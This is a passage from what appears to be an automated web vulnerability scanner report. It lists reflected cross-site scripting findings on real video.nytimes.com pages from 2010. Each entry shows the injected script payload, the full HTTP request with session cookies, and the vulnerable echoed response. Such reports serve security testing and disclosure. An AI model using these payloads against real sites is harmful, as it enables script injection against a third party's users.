<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/117ad6f"><script>alert(1)</script>1ea5dd66c51/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html">
...[SNIP]...

3.342. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d456b"><script>alert(1)</script>4e2b2b72a78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05d456b"><script>alert(1)</script>4e2b2b72a78/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:04:14 GMT
Content-type: text/html
Content-Length: 233621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05d456b"><script>alert(1)</script>4e2b2b72a78/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html">
...[SNIP]...

3.343. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f104e"><script>alert(1)</script>7bab6680e78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html?f104e"><script>alert(1)</script>7bab6680e78=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:09 GMT
Content-type: text/html
Content-Length: 229421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html?f104e"><script>alert(1)</script>7bab6680e78=1">
...[SNIP]...

3.344. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a18"><script>alert(1)</script>2f470b8f22e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201070a18"><script>alert(1)</script>2f470b8f22e/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:02:02 GMT
Content-type: text/html
Content-Length: 233627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201070a18"><script>alert(1)</script>2f470b8f22e/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.345. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c0f"><script>alert(1)</script>73b777c847d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11a7c0f"><script>alert(1)</script>73b777c847d/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:03:49 GMT
Content-type: text/html
Content-Length: 233627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11a7c0f"><script>alert(1)</script>73b777c847d/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.346. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62957"><script>alert(1)</script>f0db38f5a7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/0562957"><script>alert(1)</script>f0db38f5a7b/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:04:36 GMT
Content-type: text/html
Content-Length: 233625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/0562957"><script>alert(1)</script>f0db38f5a7b/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.347. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22d2f"%3bb95f9f79a96 was submitted in the REST URL parameter 5. This input was echoed as 22d2f";b95f9f79a96 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/11/05/sports22d2f"%3bb95f9f79a96/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:06:37 GMT
Content-type: text/html
Content-Length: 234445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytsports22d2f";b95f9f79a96";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "sports22d2f";b95f9f79a96";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.348. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d45ca"><script>alert(1)</script>a9e08a3aa5c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sportsd45ca"><script>alert(1)</script>a9e08a3aa5c/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:06:21 GMT
Content-type: text/html
Content-Length: 234563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sportsd45ca"><script>alert(1)</script>a9e08a3aa5c/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.349. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19c1b'%3b0df69ef1813 was submitted in the REST URL parameter 5. This input was echoed as 19c1b';0df69ef1813 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/11/05/sports19c1b'%3b0df69ef1813/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:07:54 GMT
Content-type: text/html
Content-Length: 234325

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
f%20Zenyatta%27s%20career.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'sports19c1b';0df69ef1813' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.350. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32eb"><script>alert(1)</script>e1266278a7b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sports/1248069286580a32eb"><script>alert(1)</script>e1266278a7b/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:10:12 GMT
Content-type: text/html
Content-Length: 233627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sports/1248069286580a32eb"><script>alert(1)</script>e1266278a7b/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.351. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7b96"><script>alert(1)</script>eed56d5ef11 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.htmlb7b96"><script>alert(1)</script>eed56d5ef11 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:00 GMT
Content-type: text/html
Content-Length: 234486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.htmlb7b96"><script>alert(1)</script>eed56d5ef11">
...[SNIP]...

3.352. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8480"><script>alert(1)</script>c70f747ab3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html?c8480"><script>alert(1)</script>c70f747ab3f=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:43 GMT
Content-type: text/html
Content-Length: 234398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html?c8480"><script>alert(1)</script>c70f747ab3f=1">
...[SNIP]...

3.353. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a936"><script>alert(1)</script>2e4b7e8b2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/20103a936"><script>alert(1)</script>2e4b7e8b2c/11/08/business/media/1248069229412/chinese-animation-.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
